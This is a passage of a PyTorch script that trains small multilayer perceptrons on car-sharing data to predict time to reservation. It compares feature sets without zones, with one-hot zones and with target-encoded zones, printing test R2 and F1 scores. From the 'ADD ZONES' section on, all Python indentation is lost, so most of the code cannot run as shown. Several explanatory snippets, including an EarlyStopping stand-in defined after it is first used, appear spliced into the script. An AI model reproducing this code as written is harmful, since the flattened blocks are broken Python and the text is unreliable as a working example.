        torch.save(model.state_dict(), self.path)
        self.val_loss_min = val_loss

def r2_loss(output, target):
    target_mean = torch.mean(target)
    ss_tot = torch.sum((target - target_mean) ** 2)
    ss_res = torch.sum((target - output) ** 2)
    r2 = 1 - ss_res / ss_tot
    return -r2
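# Quick numeric check of the formula above (r2_loss returns the negated R^2 so
# that minimizing the loss maximizes R^2): for a perfect prediction ss_res is 0
# and the loss attains its minimum of -1. Plain-NumPy mirror of the same math:
_target = np.array([1.0, 2.0, 3.0, 4.0])
_output = _target.copy()
_ss_tot = np.sum((_target - _target.mean()) ** 2)
_ss_res = np.sum((_target - _output) ** 2)
_neg_r2 = -(1 - _ss_res / _ss_tot)
assert _neg_r2 == -1.0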
# Load full Data
df_full = pd.read_csv('Data/SimpleNNData.csv', index_col=0, parse_dates = [1]).sort_values(by = 'time')
y = df_full.time_to_reservation
df_full.drop(columns=['time_to_reservation', 'hour_index'], inplace=True)
# Load weather
Weather_Scale = pd.read_csv('Data/MinMaxWeather.csv', index_col=0)
weather_var = list(Weather_Scale.index)
# Load slicing
with open("Data/Sample_CC", "rb") as fp:
    cc = pickle.load(fp)
# For classification
Clas_Coef = dict(pd.concat([df_full.time.dt.hour.iloc[np.concatenate(cc[:2])],y.iloc[np.concatenate(cc[:2])]], axis = 1).groupby('time')['time_to_reservation'].mean()*2)
df_clas = pd.concat([df_full.time.dt.hour.iloc[cc[2]],y.iloc[cc[2]]], axis = 1)
df_clas['Cut'] = df_clas.time.map(dict(Clas_Coef))
# Common setting
batch_size = 512
num_epochs = 1500
# Set up print
time_start = time.time()
sys.stdout = open("Results/MLP_3Sizes_Results.txt", "w")
##################################
### NO ZONES
##################################
print('----------------------------------------------')
print('---NO ZONES')
print('----------------------------------------------')
# Prep data
df = df_full.drop(columns = list(df_full.filter(regex = 'lz').columns) + weather_var + ['dist_to_station','time'])
df['leave_fuel'] = df['leave_fuel']/100
df['degree'] = df['degree']/50
X_train = torch.tensor(df.iloc[cc[0]].to_numpy(dtype = 'float')).float()
y_train = torch.tensor(y.iloc[cc[0]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_val = torch.tensor(df.iloc[cc[1]].to_numpy(dtype = 'float')).float()
y_val = torch.tensor(y.iloc[cc[1]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_test = torch.tensor(df.iloc[cc[2]].to_numpy(dtype = 'float')).float()
y_test = torch.tensor(y.iloc[cc[2]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
# define network
class Net(nn.Module):
    def __init__(self):
        super(Net, self).__init__()

        def init_weights(m):
            if isinstance(m, nn.Linear):
                torch.nn.init.xavier_normal_(m.weight)
                m.bias.data.fill_(0.01)

        self.seq = nn.Sequential(
            nn.Linear(9, 32),
            nn.ReLU(),
            nn.Dropout(0.0),
            nn.Linear(32, 1),
        )
        self.seq.apply(init_weights)

    def forward(self, x):
        x = self.seq(x)
        return x


net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.002, weight_decay=0.0001)  # changed to Adam; learning and regularization rates set
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
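# Note: the floor divisions above (num_samples // batch_size) silently drop the
# tail of each split, so with batch_size = 512 up to 511 samples per split are
# never visited in an epoch. Illustrative arithmetic (sample count assumed):
_n_samples = 10_000
_batch_size = 512  # same value as batch_size above
_n_batches = _n_samples // _batch_size  # 19 full batches
_n_dropped = _n_samples - _n_batches * _batch_size  # 272 samples left unused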
path = 'Checkpoints/NoZones.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
    # Forward -> Backprop -> Update params
    ## Train
    cur_loss_train = 0
    net.train()
    for i in range(num_batches_train):
        optimizer.zero_grad()
        slce = get_slice(i, batch_size)
        output = net(X_train[slce])

        # compute gradients given loss
        target_batch = y_train[slce]
        batch_loss = r2_loss(output, target_batch)
        batch_loss.backward()
        optimizer.step()
        cur_loss_train += batch_loss
    train_losses.append(cur_loss_train / num_batches_train)

    ### Evaluate training
    with torch.no_grad():
        net.eval()
        train_preds, train_targs = [], []
        for i in range(num_batches_train):
            slce = get_slice(i, batch_size)
            output = net(X_train[slce])
            preds = output
            train_targs += list(y_train[slce].numpy())
            train_preds += list(preds.data.numpy())

        ### Evaluate validation
        val_preds, val_targs = [], []
        cur_loss_val = 0
        for i in range(num_batches_valid):
            slce = get_slice(i, batch_size)
            output = net(X_val[slce])
            preds = output
            val_targs += list(y_val[slce].numpy())
            val_preds += list(preds.data.numpy())
            cur_loss_val += r2_loss(output, y_val[slce])
        val_losses.append(cur_loss_val / num_batches_valid)

        train_r2_cur = r2_score(train_targs, train_preds)
        valid_r2_cur = r2_score(val_targs, val_preds)

        train_r2.append(train_r2_cur)
        valid_r2.append(valid_r2_cur)

    # EarlyStopping
    early_stopping(val_losses[-1], net)
    if early_stopping.early_stop:
        break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
    def __init__(self):
        super(Net, self).__init__()

        def init_weights(m):
            if isinstance(m, nn.Linear):
                torch.nn.init.xavier_normal_(m.weight)
                m.bias.data.fill_(0.01)

        self.seq = nn.Sequential(
            nn.Linear(9, 32),
            nn.ReLU(),
            nn.Dropout(0.0),
            nn.Linear(32, 16),
            nn.ReLU(),
            nn.Dropout(0.0),
            nn.Linear(16, 1),
        )
        self.seq.apply(init_weights)

    def forward(self, x):
        x = self.seq(x)
        return x


net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.002, weight_decay=0.0001)  # changed to Adam; learning and regularization rates set
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/NoZones.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
    # Forward -> Backprop -> Update params
    ## Train
    cur_loss_train = 0
    net.train()
    for i in range(num_batches_train):
        optimizer.zero_grad()
        slce = get_slice(i, batch_size)
        output = net(X_train[slce])

        # compute gradients given loss
        target_batch = y_train[slce]
        batch_loss = r2_loss(output, target_batch)
        batch_loss.backward()
        optimizer.step()
        cur_loss_train += batch_loss
    train_losses.append(cur_loss_train / num_batches_train)

    ### Evaluate training
    with torch.no_grad():
        net.eval()
        train_preds, train_targs = [], []
        for i in range(num_batches_train):
            slce = get_slice(i, batch_size)
            output = net(X_train[slce])
            preds = output
            train_targs += list(y_train[slce].numpy())
            train_preds += list(preds.data.numpy())

        ### Evaluate validation
        val_preds, val_targs = [], []
        cur_loss_val = 0
        for i in range(num_batches_valid):
            slce = get_slice(i, batch_size)
            output = net(X_val[slce])
            preds = output
            val_targs += list(y_val[slce].numpy())
            val_preds += list(preds.data.numpy())
            cur_loss_val += r2_loss(output, y_val[slce])
        val_losses.append(cur_loss_val / num_batches_valid)

        train_r2_cur = r2_score(train_targs, train_preds)
        valid_r2_cur = r2_score(val_targs, val_preds)

        train_r2.append(train_r2_cur)
        valid_r2.append(valid_r2_cur)

    # EarlyStopping
    early_stopping(val_losses[-1], net)
    if early_stopping.early_stop:
        break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
    def __init__(self):
        super(Net, self).__init__()

        def init_weights(m):
            if isinstance(m, nn.Linear):
                torch.nn.init.xavier_normal_(m.weight)
                m.bias.data.fill_(0.01)

        self.seq = nn.Sequential(
            nn.Linear(9, 128),
            nn.ReLU(),
            nn.Dropout(0.0),
            nn.Linear(128, 64),
            nn.ReLU(),
            nn.Dropout(0.0),
            nn.Linear(64, 1),
        )
        self.seq.apply(init_weights)

    def forward(self, x):
        x = self.seq(x)
        return x


net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.002, weight_decay=0.0001)  # changed to Adam; learning and regularization rates set
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/NoZones.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
    # Forward -> Backprop -> Update params
    ## Train
    cur_loss_train = 0
    net.train()
    for i in range(num_batches_train):
        optimizer.zero_grad()
        slce = get_slice(i, batch_size)
        output = net(X_train[slce])

        # compute gradients given loss
        target_batch = y_train[slce]
        batch_loss = r2_loss(output, target_batch)
        batch_loss.backward()
        optimizer.step()
        cur_loss_train += batch_loss
    train_losses.append(cur_loss_train / num_batches_train)

    ### Evaluate training
    with torch.no_grad():
        net.eval()
        train_preds, train_targs = [], []
        for i in range(num_batches_train):
            slce = get_slice(i, batch_size)
            output = net(X_train[slce])
            preds = output
            train_targs += list(y_train[slce].numpy())
            train_preds += list(preds.data.numpy())

        ### Evaluate validation
        val_preds, val_targs = [], []
        cur_loss_val = 0
        for i in range(num_batches_valid):
            slce = get_slice(i, batch_size)
            output = net(X_val[slce])
            preds = output
            val_targs += list(y_val[slce].numpy())
            val_preds += list(preds.data.numpy())
            cur_loss_val += r2_loss(output, y_val[slce])
        val_losses.append(cur_loss_val / num_batches_valid)

        train_r2_cur = r2_score(train_targs, train_preds)
        valid_r2_cur = r2_score(val_targs, val_preds)

        train_r2.append(train_r2_cur)
        valid_r2.append(valid_r2_cur)

    # EarlyStopping
    early_stopping(val_losses[-1], net)
    if early_stopping.early_stop:
        break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
print(f'Time spent: {time.time()-time_start}')
print('\n\n')
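# EarlyStopping is used throughout but defined elsewhere in this project. A
# minimal class compatible with the calls above (tracks the best validation
# loss, checkpoints the best weights to `path`, and stops after `patience`
# epochs without improvement) might look like this sketch; the guard keeps it
# from shadowing the real implementation:
import torch
if 'EarlyStopping' not in globals():
    class EarlyStopping:
        def __init__(self, patience=20, verbose=False, path='checkpoint.pt'):
            self.patience = patience
            self.verbose = verbose
            self.path = path
            self.best_loss = None
            self.counter = 0
            self.early_stop = False
        def __call__(self, val_loss, model):
            if self.best_loss is None or val_loss < self.best_loss:
                # improvement: reset the counter and checkpoint the model
                self.best_loss = val_loss
                self.counter = 0
                torch.save(model.state_dict(), self.path)
            else:
                self.counter += 1
                if self.counter >= self.patience:
                    self.early_stop = True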
##################################
### ADD ZONES
##################################
print('----------------------------------------------')
print('---ADD ZONES')
print('----------------------------------------------')
# Prep data
df = df_full.drop(columns = weather_var + ['dist_to_station','time'])
df['leave_fuel'] = df['leave_fuel']/100
df['degree'] = df['degree']/50
X_train = torch.tensor(df.iloc[cc[0]].to_numpy(dtype = 'float')).float()
y_train = torch.tensor(y.iloc[cc[0]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_val = torch.tensor(df.iloc[cc[1]].to_numpy(dtype = 'float')).float()
y_val = torch.tensor(y.iloc[cc[1]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_test = torch.tensor(df.iloc[cc[2]].to_numpy(dtype = 'float')).float()
y_test = torch.tensor(y.iloc[cc[2]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(265,32),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(32,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
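# Sanity check on the parameter count printed above: a Linear(in, out) layer
# has in*out weights plus out biases, so this 265->32->1 stack has
# 265*32 + 32 + 32*1 + 1 = 8545 parameters. Standalone recount (the _seq and
# _n_params names are illustrative only):
import torch.nn as nn
_seq = nn.Sequential(nn.Linear(265, 32), nn.ReLU(), nn.Linear(32, 1))
_n_params = sum(p.numel() for p in _seq.parameters())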
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/WithZones.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprop -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss.item()
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(265,32),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(32,16),
nn.ReLU(),
nn.Dropout(0.1),
nn.Linear(16,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/WithZones.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprop -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss.item()
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(265,128),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(128,64),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(64,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/WithZones.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprop -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss.item()
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
print(f'Time spent: {time.time()-time_start}')
print('\n\n')
##################################
### ADD ENCODED ZONES
##################################
print('----------------------------------------------')
print('---ADD ENCODED ZONES')
print('----------------------------------------------')
# Prep data
df = df_full.drop(columns = weather_var + ['dist_to_station','time'])
df['leave_fuel'] = df['leave_fuel']/100
df['degree'] = df['degree']/50
Mean_Zone_Times = dict(pd.DataFrame({'Zone': df.iloc[np.concatenate(cc[:2])].filter(regex = 'lz').idxmax(axis = 1).values, 'Time':y.iloc[np.concatenate(cc[:2])].values}).groupby('Zone').mean().squeeze())
df['Zone_E'] = df.filter(regex = 'lz').idxmax(1).map(Mean_Zone_Times)
df.drop(columns = df.filter(regex = 'lz'), inplace = True)
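# The three lines above target-encode the zones: each one-hot 'lz' zone column
# is replaced by the mean target time of that zone, computed only on the
# train+validation rows (cc[0] and cc[1]) to avoid test leakage. Toy
# illustration with hypothetical data (_toy and _zone_means are illustrative):
import pandas as pd
_toy = pd.DataFrame({'Zone': ['lz_a', 'lz_b', 'lz_a'], 'Time': [1.0, 5.0, 3.0]})
_zone_means = dict(_toy.groupby('Zone')['Time'].mean())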
X_train = torch.tensor(df.iloc[cc[0]].to_numpy(dtype = 'float')).float()
y_train = torch.tensor(y.iloc[cc[0]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_val = torch.tensor(df.iloc[cc[1]].to_numpy(dtype = 'float')).float()
y_val = torch.tensor(y.iloc[cc[1]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_test = torch.tensor(df.iloc[cc[2]].to_numpy(dtype = 'float')).float()
y_test = torch.tensor(y.iloc[cc[2]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(10,32),
nn.ReLU(),
nn.Dropout(0.0),
nn.Linear(32,16),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(16,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/WithZonesEncoded.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprop -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss.item()
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(10,128),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(128,64),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(64,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/WithZonesEncoded.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprop -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss.item()
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(10,128),
nn.ReLU(),
nn.Dropout(0.0),
nn.Linear(128,128),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(128,64),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(64,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/WithZonesEncoded.pt'
